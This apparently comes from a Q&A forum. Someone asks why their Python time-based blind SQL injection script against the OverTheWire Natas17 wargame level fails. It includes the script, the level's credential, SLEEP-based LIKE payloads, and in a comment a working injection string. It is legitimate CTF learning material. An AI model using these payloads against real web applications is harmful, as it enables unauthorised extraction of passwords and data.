# Why does my SQL Injection for NATAS17 at OTW not work?

Tags: python, sql, python-2.7, web-applications, sql-injection

```
import requests
import re
import logging
import timeit
'''
The database servername is natas17
The database name is natas17
The Table Name is : users
The Table Columns are : username & password
SELECT * from users where username="%" AND 1=SLEEP(3)
'''
URL = 'http://natas17.natas.labs.overthewire.org/?debug'
username = 'natas17'
password = '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'
characters = 'abcdefghijklmnopqrstuvwxyz'\
            'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\
            '0123456789'


for ch2 in characters:
    query = '\b\b\b\b\b\b\b\b\b\bBINARY password LIKE "'+ch2+'%" AND SLEEP(5) #'
    response = requests.post(URL, auth = (username , password) , data = {"username":query} )            
    data = re.search (r'Executing query.+<br>',response.text).group(0)
    print data
```

[http://natas17.natas.labs.overthewire.org/index-source.html\](http://natas17.natas.labs.overthewire.org/index-source.html%5C)
password : 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

So I am running an SQL injection on the Natas17 on OverTheWire, but the query I am putting in doesn't work.

SELECT * FROM users WHERE BINARY password LIKE "a%" AND SLEEP(5)
SELECT * FROM users WHERE BINARY password LIKE "b%" AND SLEEP(5)
SELECT * FROM users WHERE BINARY password LIKE "c%" AND SLEEP(5)
....

But the query result do not pause anywhere, but I know that the password starts with 'x'.

Can someone please find out the issue with my query?
Could the \b be causing the error?

Answer (score 0):

Don't forget the " at the end of the query, the request should be like

```sql
password LIKE BINARY "a%" AND SLEEP(5) AND "1"="1
```

Comment: Actually the php script automatically adds the “ at the end, which is why I skipped the last “.

Comment: Sorry I'm a noob in sql I didn't know that # was a comment. When I was solving the challenge that was my mistake, maybe Its something else in the query. I did solve the challenge tho, my query was natas18" AND password LIKE BINARY "%a%" AND sleep(5) AND "1" = "1